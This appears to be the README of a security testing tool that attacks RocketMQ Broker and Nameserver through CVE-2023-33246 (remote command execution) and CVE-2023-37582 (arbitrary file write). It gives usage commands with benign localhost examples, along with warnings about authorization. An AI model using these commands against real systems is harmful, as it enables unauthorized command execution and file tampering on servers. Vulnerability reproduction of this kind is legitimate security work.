A tool for testing RocketMQ vulnerabilities.
THIS IS A SECURITY TESTING TOOL THAT MAY CAUSE SEVERE DAMAGE TO TARGET APPLICATIONS
- This tool can disrupt normal operations of RocketMQ services
- DO NOT use in production environments
- DO NOT use without explicit authorization
- Use at your own risk
- Authors are not responsible for any damage caused by this tool
- Attack RocketMQ Broker (CVE-2023-33246)
- Attack RocketMQ Nameserver (CVE-2023-37582)
- Easy-to-use command-line interface
- Support for both short and long command options
Download the latest built JAR file from Releases.
Reproduce environment: CVE-2023-33246
Command-line options:
-t, --target
: Target address in host:port format-c, --cmd
: Command to execute on the target
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackBroker --target <host:port> --cmd <command>
# Example:
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackBroker --target 127.0.0.1:10911 --cmd "id"
Reproduce environment: CVE-2023-37582
Command-line options:
-t, --target
: Target address in host:port format-f, --file
: Target file path to write-d, --data
: Content to write into the file
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target <host:port> --file <file_path> --data <content>
# Example:
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target 127.0.0.1:9876 --file /tmp/test.txt --data "Hello World"
Requires JDK 8 or later.
./gradlew shadowJar
The built JAR file will be located at build/libs/rocketmq-attack-1.1-SNAPSHOT.jar
This project is licensed under the MIT License - see the LICENSE file for details.